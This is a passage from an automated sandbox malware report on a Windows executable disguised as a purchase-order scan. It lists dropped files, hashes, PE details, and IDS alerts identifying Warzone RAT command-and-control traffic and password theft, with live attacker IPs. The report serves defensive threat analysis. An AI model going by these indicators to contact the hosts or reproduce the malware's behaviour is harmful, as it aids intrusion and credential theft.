Preview: .$Z.9.......55..............................................7...U...~?.W.7..W.2...:<..<...88.>.,..<.8.8........CC..........Q.N.UN.UN.U.o|U..U..tU..U...U..U..^U..U...UL.U...UJ.U..3U..U...U..U
N.>Ux.U/..UP.U/.^U..U..xU..U/..U..U...2N.U.{...7..O(............'A7.O......9.....y.......:............................................7....................................>G....9...9....................b_................
.....................................f.................................................................*.......................................*........f....:.................................*....Z.......8.........................>G..........8.................
........b_..........J................................9......t...................<.<......9...9...9..v................................9..............................................................................................................................
..................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\Scxozmyplhmqutylctxlkglsugzstqx[1]

Process: C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe

File Type: data

Category: dropped

Size (bytes): 374272

Entropy (8bit): 7.591779868830508

Encrypted: false

SSDEEP: 6144:b4AP3DUNDyuTUze97nNhmOtgDQBCu3StMGP3KtUmpOypRavJLcBTZIqysbd3WKgy:bfzO0z7ygcMwRgQBTZbBbd3WT6ptDJYq

MD5: 1D6F69EA73F2FB295552EB8F608B5675

SHA1: D19B3E3A514D5754AA554747D19337207E0EE097

SHA-256: 6952DDE712DFCE0F1049AFF27CE9B8E68451672DA9DD7702201EA1D633E2B633

SHA-512: 9A60767CE2E045525B55710461496CFC03D9F7B2DB18E8D5ABAEBF0771E70759371DDEA50754E09B8D2780A6DAD1845624F356E86552508A685BEA252CED19C2

Malicious: false

C:\Users\user\AppData\Local\Temp\159.exe

Process: C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe

File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed

Category: dropped

Size (bytes): 72192

Entropy (8bit): 7.8845650193926184

Encrypted: false

SSDEEP: 1536:tjL6b1xoQ66K+jLMqPHULq87qdGN2B30GfDQ+1FIRXWHH0:t0BVbjQaNpd82xpLQ+126H0

MD5: CA96229390A0E6A53E8F2125F2C01114

SHA1: A54B1081CF58724F8CB292B4D165DFEE2FB1C9F6

SHA-256: 0DF3D05900E7B530F6C2A281D43C47839F2CF2A5D386553C8DC46E463A635A2C

SHA-512: E93445BCE6C8B6F51890309577A0EA9369860D2E6BF8CC0CA708879A77BB176D27C5F559BBDB7DEB4B719AEE0FC48D9068C293559F7629BAF4EC3515898102E
F

Malicious: true

Antivirus: Antivirus: Avira, Detection: 100%

Antivirus: Metadefender, Detection: 31%, Browse
Antivirus: ReversingLabs, Detection: 85%

Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j.9...WG..WG..WG.~TF".WG.~RF..WG.~SF<.WG|vRF..WG|vSF

?.WG|vTF;.WG.w_F .WG.~QF/.WG.~VF).WG..VGC.WG.wRF,.WG.w.G/.WG.wUF/.WGRich..WG........................PE..L....yY\................. ..........P.............@.........................
..............@.................................................................h.......................................................................................UPX0....................................UPX1..... [email protected]
src...............................@.................................................................................................................................................................................................................................
.....................................................................................................................3.95.UPX!....

C:\Users\user\AppData\Roaming\.JmyHai.tmp

Process: C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 40960

Entropy (8bit): 0.792852251086831

Encrypted: false

SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw

MD5: 81DB1710BB13DA3343FC0DF9F00BE49F

SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB

SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB

SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1

Malicious: false

Copyright Joe Security LLC 2022 Page 21 of 74

Preview: SQLite format 3......@ ..........................................................................C.......................................................................................................................................................
..............................................................................................................................................................................................................................................................................
..............................................................................................................................................................................................................................................................................
..................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JJrxrvA.tmp

Process: C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe

File Type: ASCII text, with very long lines, with no line terminators

Category: dropped

Size (bytes): 87300

Entropy (8bit): 6.102677495198111

Encrypted: false

SSDEEP: 1536:CdLUGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR1:CdLUFcbXafIB0u1GOJmA3iuR1

MD5: D5D29F3050E6C920ECA7B7276AB537CE

SHA1: CE24853BBE0BCC044B2216385612CBA2A754E4D4

SHA-256: C0963F0007CBC3AA6AA3B9A906173730BB6B7644BE9D3DA903D64B42D4387FDB

SHA-512: 3BB59E005958968218FF3763B831B8898C47A6543CD6B017D52DA9176DBE0D6D545F25FB901D11DA2B30D9BA86DCB59E0F295A9C1B14579C8B764849CFB76D8
C

Malicious: false

Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":
{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},
"network_time":{"network_time_mapping":{"local":1.601451012154773e+12,"network":1.601451004e+12,"ticks":765205613.0,"uncertainty":4222325.0}},"os_crypt":{"encry
pted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPq
IYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqp
s4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},
"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245922715401452"},"plugins":{"metadata":{"adobe-flash-player":{"d

\Device\ConDrv

Process: C:\Windows\SysWOW64\netsh.exe

File Type: ASCII text, with CRLF line terminators

Category: dropped

Size (bytes): 7

Entropy (8bit): 2.2359263506290326

Encrypted: false

SSDEEP: 3:t:t

MD5: F1CA165C0DA831C9A17D08C4DECBD114

SHA1: D750F8260312A40968458169B496C40DACC751CA

SHA-256: ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8

SHA-512: 052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646

Malicious: false

Preview: Ok.....

Static File Info

General
File type: PE32 executable (GUI) Intel 80386, for MS Windows

Entropy (8bit): 7.040069666763753

TrID: Win32 Executable (generic) a (10002005/4) 99.81%

Windows Screen Saver (13104/52) 0.13%
Win16/32 Executable Delphi generic (2074/23) 0.02%
Generic Win/DOS Executable (2004/3) 0.02%
DOS Executable Generic (2002/1) 0.02%

File name: Scan_IMG-Purchase Order.exe

File size: 818176

MD5: c9ee1d6a90be7524b01814f48b39b232

SHA1: 12c080569f9bf82e0c1538bc9caef4de06db5bfd

SHA256: 6da3064773edf094f014b7aa13f2e3f74634f62552a91f88bf306f962bbf0563

SHA512: a616fc149d7ed3ed199aab73b68da13df0304c310d7aa85d8e5e8a14c37070835e1c5f04631c03c270b6fc803c469ee35350049b930d6f03f6a320fe02348acb

SSDEEP: 24576:XWWH7k2z/m1uA7Zo4pdUtVSn52pAf2rDNtl2aCHXeO:XWrqMpd+Sn52KN5

TLSH: 5C059E66F2904937D073193C4D475B54A839BE113928E88A2BF92E4C5FF9B903A393D7

Copyright Joe Security LLC 2022 Page 22 of 74

File Content MZP.....................@...............................................!..L.!..This program must be run under
Preview: Win32..$7.......................................................................................................................................

File Icon

Icon Hash: 00d0524c687048a0

Static PE Info

General
Entrypoint: 0x47a79c

Entrypoint Section: .itext

Digitally signed: false

Imagebase: 0x400000

Subsystem: windows gui

Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

DLL Characteristics:

Time Stamp: 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]

TLS Callbacks:

CLR (.Net) Version:

OS Version Major: 4

OS Version Minor: 0

File Version Major: 4

File Version Minor: 0

Subsystem Version Major: 4

Subsystem Version Minor: 0

Import Hash: 781d4553e908b497b062e7e382c7936c

Entrypoint Preview
Instruction

push ebp

mov ebp, esp

add esp, FFFFFFF0h

mov eax, 004793D8h

call 00007F8750AD4D69h

mov eax, dword ptr [0047CE20h]

mov eax, dword ptr [eax]

call 00007F8750B32549h

mov eax, dword ptr [0047CE20h]

mov eax, dword ptr [eax]

mov edx, 0047A7FCh

call 00007F8750B31FD0h

mov ecx, dword ptr [0047CED4h]

mov eax, dword ptr [0047CE20h]

mov eax, dword ptr [eax]

mov edx, dword ptr [00478D6Ch]

call 00007F8750B32538h

mov eax, dword ptr [0047CE20h]

mov eax, dword ptr [eax]

call 00007F8750B325ACh

call 00007F8750AD2BD7h

add byte ptr [eax], al

Data Directories
Name Virtual Address Virtual Size Is in Section

IMAGE_DIRECTORY_ENTRY_EXPORT 0x0 0x0

IMAGE_DIRECTORY_ENTRY_IMPORT 0x81000 0x288c .idata

IMAGE_DIRECTORY_ENTRY_RESOURCE 0x8f000 0x40e00 .rsrc

Copyright Joe Security LLC 2022 Page 23 of 74

Name Virtual Address Virtual Size Is in Section

IMAGE_DIRECTORY_ENTRY_EXCEPTION 0x0 0x0

IMAGE_DIRECTORY_ENTRY_SECURITY 0x0 0x0

IMAGE_DIRECTORY_ENTRY_BASERELOC 0x86000 0x8ab0 .reloc

IMAGE_DIRECTORY_ENTRY_DEBUG 0x0 0x0

IMAGE_DIRECTORY_ENTRY_COPYRIGHT 0x0 0x0

IMAGE_DIRECTORY_ENTRY_GLOBALPTR 0x0 0x0

IMAGE_DIRECTORY_ENTRY_TLS 0x85000 0x18 .rdata

IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG 0x0 0x0

IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT 0x0 0x0

IMAGE_DIRECTORY_ENTRY_IAT 0x817c8 0x64c .idata

IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT 0x0 0x0

IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 0x0 0x0

IMAGE_DIRECTORY_ENTRY_RESERVED 0x0 0x0

Sections
Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics

.text 0x1000 0x78640 0x78800 False 0.5161294897562241 data 6.53524903966739 IMAGE_SCN_CNT_CODE,

IMAGE_SCN_MEM_EXECUTE,
IMAGE_SCN_MEM_READ

.itext 0x7a000 0x818 0xa00 False 0.521875 data 5.527269204979214 IMAGE_SCN_CNT_CODE,

IMAGE_SCN_MEM_EXECUTE,
IMAGE_SCN_MEM_READ

.data 0x7b000 0x1fd4 0x2000 False 0.409912109375 data 3.9171046695997758 IMAGE_SCN_CNT_INITIALIZE

D_DATA,
IMAGE_SCN_MEM_READ,
IMAGE_SCN_MEM_WRITE

.bss 0x7d000 0x38e8 0x0 False 0 empty 0.0 IMAGE_SCN_MEM_READ,

IMAGE_SCN_MEM_WRITE

.idata 0x81000 0x288c 0x2a00 False 0.31156994047619047 data 5.071487766833571 IMAGE_SCN_CNT_INITIALIZE

D_DATA,
IMAGE_SCN_MEM_READ,
IMAGE_SCN_MEM_WRITE

.tls 0x84000 0x34 0x0 False 0 empty 0.0 IMAGE_SCN_MEM_READ,

IMAGE_SCN_MEM_WRITE

.rdata 0x85000 0x18 0x200 False 0.05078125 data 0.2108262677871819 IMAGE_SCN_CNT_INITIALIZE

D_DATA,
IMAGE_SCN_MEM_READ

.reloc 0x86000 0x8ab0 0x8c00 False 0.5760602678571428 data 6.643303307247631 IMAGE_SCN_CNT_INITIALIZE

D_DATA,
IMAGE_SCN_MEM_DISCARDA
BLE,
IMAGE_SCN_MEM_READ

.rsrc 0x8f000 0x40e00 0x40e00 False 0.5807141136801541 data 7.343471684842239 IMAGE_SCN_CNT_INITIALIZE

D_DATA,
IMAGE_SCN_MEM_READ

Resources
Name RVA Size Type Language Country

AUDIOES 0x8fc1c 0x3697c RIFF (little-endian) data, WAVE audio, Microsoft English United States
PCM, 16 bit, stereo 44100 Hz

RT_CURSOR 0xc6598 0x134 data English United States

RT_CURSOR 0xc66cc 0x134 data English United States

RT_CURSOR 0xc6800 0x134 data English United States

RT_CURSOR 0xc6934 0x134 data English United States

RT_CURSOR 0xc6a68 0x134 data English United States

RT_CURSOR 0xc6b9c 0x134 data English United States

RT_CURSOR 0xc6cd0 0x134 data English United States

RT_BITMAP 0xc6e04 0x1d0 data English United States

RT_BITMAP 0xc6fd4 0x1e4 data English United States

RT_BITMAP 0xc71b8 0x1d0 data English United States

RT_BITMAP 0xc7388 0x1d0 data English United States

RT_BITMAP 0xc7558 0x1d0 data English United States

RT_BITMAP 0xc7728 0x1d0 data English United States

RT_BITMAP 0xc78f8 0x1d0 data English United States

RT_BITMAP 0xc7ac8 0x1d0 data English United States

Copyright Joe Security LLC 2022 Page 24 of 74

Name RVA Size Type Language Country

RT_BITMAP 0xc7c98 0x1d0 data English United States

RT_BITMAP 0xc7e68 0x1d0 data English United States

RT_BITMAP 0xc8038 0xe8 GLS_BINARY_LSB_FIRST English United States

RT_ICON 0xc8120 0x25a8 data

RT_ICON 0xca6c8 0x10a8 data

RT_ICON 0xcb770 0x988 data

RT_ICON 0xcc0f8 0x468 GLS_BINARY_LSB_FIRST

RT_DIALOG 0xcc560 0x52 data

RT_DIALOG 0xcc5b4 0x52 data

RT_STRING 0xcc608 0x298 data

RT_STRING 0xcc8a0 0x2e0 data

RT_STRING 0xccb80 0xc0 data

RT_STRING 0xccc40 0xec data

RT_STRING 0xccd2c 0x350 data

RT_STRING 0xcd07c 0x3c4 data

RT_STRING 0xcd440 0x388 data

RT_STRING 0xcd7c8 0x3f0 data

RT_STRING 0xcdbb8 0x190 data

RT_STRING 0xcdd48 0xcc data

RT_STRING 0xcde14 0x1c4 data

RT_STRING 0xcdfd8 0x3c8 data

RT_STRING 0xce3a0 0x338 data

RT_STRING 0xce6d8 0x294 data

RT_RCDATA 0xce96c 0x10 data

RT_RCDATA 0xce97c 0x330 data

RT_RCDATA 0xcecac 0x904 Delphi compiled form 'TDlgAddFiles'

RT_GROUP_CURSOR 0xcf5b0 0x14 Lotus unknown worksheet or configuration, English United States
revision 0x1

RT_GROUP_CURSOR 0xcf5c4 0x14 Lotus unknown worksheet or configuration, English United States
revision 0x1

RT_GROUP_CURSOR 0xcf5d8 0x14 Lotus unknown worksheet or configuration, English United States
revision 0x1

RT_GROUP_CURSOR 0xcf5ec 0x14 Lotus unknown worksheet or configuration, English United States
revision 0x1

RT_GROUP_CURSOR 0xcf600 0x14 Lotus unknown worksheet or configuration, English United States
revision 0x1

RT_GROUP_CURSOR 0xcf614 0x14 Lotus unknown worksheet or configuration, English United States
revision 0x1

RT_GROUP_CURSOR 0xcf628 0x14 Lotus unknown worksheet or configuration, English United States
revision 0x1

RT_GROUP_ICON 0xcf63c 0x3e data

RT_VERSION 0xcf67c 0x498 data German Germany

RT_MANIFEST 0xcfb14 0x245 XML 1.0 document, ASCII text, with CRLF line English United States
terminators

Imports
DLL Import

oleaut32.dll SysFreeString, SysReAllocStringLen, SysAllocStringLen

advapi32.dll RegQueryValueExA, RegOpenKeyExA, RegCloseKey

user32.dll GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA

kernel32.dll GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery,

WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA,
GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA,
FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer,
SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle

kernel32.dll TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA

Copyright Joe Security LLC 2022 Page 25 of 74

DLL Import

user32.dll CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx,

TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar,
ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW,
SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent,
SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture,
SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu,
ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow,
PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA,
MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA,
KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic,
IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect,
GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW,
GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor,
GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos,
GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu,
GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout,
GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow,
GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassNameA, GetClassLongA, GetClassInfoA,
GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows,
EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar,
DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA,
DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA,
DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, ChildWindowFromPoint, CheckMenuItem,
CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx,
ActivateKeyboardLayout

gdi32.dll UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel,

SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle,
RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx,
GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel,
GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx,
GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush,
CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection,
CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CombineRgn, BitBlt

version.dll VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA

kernel32.dll lstrcpyA, lstrcmpA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource,

SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar,
MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA,
GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle,
GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError,
GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId,
GetCurrentProcess, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA,
FlushInstructionCache, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread,
CreateFileA, CreateEventA, CompareStringA, CloseHandle

advapi32.dll RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey

oleaut32.dll GetErrorInfo, SysFreeString

ole32.dll CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitialize

kernel32.dll Sleep

oleaut32.dll SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy,

VariantClear, VariantInit

comctl32.dll _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read,

ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave,
ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx,
ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add,
ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls

comdlg32.dll GetOpenFileNameA

kernel32 VirtualProtect, GetProcAddress

URL AddMIMEFileTypesPS

Possible Origin
Language of compilation system Country where language is spoken Map

English United States

German Germany

Copyright Joe Security LLC 2022 Page 26 of 74

Network Behavior
Snort IDS Alerts
Source Dest
Timestamp Protocol SID Message Source IP Dest IP
Port Port

185.222.57.173192.168.2. TCP 285189 ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) 4980 49772 185.222.57.1 192.168.2.4
44980497722851895 5 73
07/25/22-
15:51:28.258544

192.168.2.4185.222.57.17 TCP 285195 ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsResponse 49772 4980 192.168.2.4 185.222.57.1
34977249802851951 1 73
07/25/22-
15:52:39.729742

192.168.2.4185.222.57.17 TCP 285194 ETPRO TROJAN Ave Maria/Warzone RAT PingResponse 49772 4980 192.168.2.4 185.222.57.1
34977249802851946 6 73
07/25/22-
15:53:08.297448

192.168.2.4185.222.57.17 TCP 285194 ETPRO TROJAN Ave Maria/Warzone RAT VNC GetModule 49772 4980 192.168.2.4 185.222.57.1
34977249802851948 8 73
07/25/22-
15:52:28.788965

185.222.57.173192.168.2. TCP 285194 ETPRO TROJAN Ave Maria/Warzone RAT PingCommand 4980 49772 185.222.57.1 192.168.2.4
44980497722851945 5 73
07/25/22-
15:53:08.296970

185.222.57.173192.168.2. TCP 285193 ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsCommand 4980 49772 185.222.57.1 192.168.2.4
44980497722851933 3 73
07/25/22-
15:52:28.734171

Network Port Distribution

Total Packets: 55

• 53443(DNS)
• (HTTPS)

TCP Packets
Timestamp Source Port Dest Port Source IP Dest IP

Jul 25, 2022 15:50:52.152517080 CEST 49757 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:52.152565956 CEST 443 49757 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:52.152652025 CEST 49757 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:52.173033953 CEST 49757 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:52.173067093 CEST 443 49757 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:52.570719004 CEST 443 49757 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:52.570954084 CEST 49757 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:53.021981001 CEST 49757 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:53.022011042 CEST 443 49757 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:53.022496939 CEST 443 49757 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:53.022582054 CEST 49757 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:53.025907040 CEST 49757 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:53.068519115 CEST 443 49757 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:53.218852043 CEST 443 49757 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:53.218882084 CEST 443 49757 103.11.189.121 192.168.2.4

Copyright Joe Security LLC 2022 Page 27 of 74

Timestamp Source Port Dest Port Source IP Dest IP

Jul 25, 2022 15:50:53.219113111 CEST 49757 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:53.219156981 CEST 443 49757 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:53.219288111 CEST 49757 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:53.221839905 CEST 49757 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:53.221862078 CEST 49757 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:53.269572973 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:53.269639015 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:53.269784927 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:53.270626068 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:53.270648956 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:53.659248114 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:53.659420013 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:53.660031080 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:53.660049915 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:53.664367914 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:53.664397001 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.043257952 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.043292046 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.043554068 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.043580055 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.043606997 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.043654919 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.234280109 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.234445095 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.234477997 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.234519958 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.234548092 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.234587908 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.234587908 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.234603882 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.234657049 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.278847933 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.279042959 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.426594019 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.426738024 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.427107096 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.427223921 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.427309036 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.427397966 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.427668095 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.427748919 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.427824974 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.427918911 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.465491056 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.465658903 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.469254971 CEST 443 49758 103.11.189.121 192.168.2.4

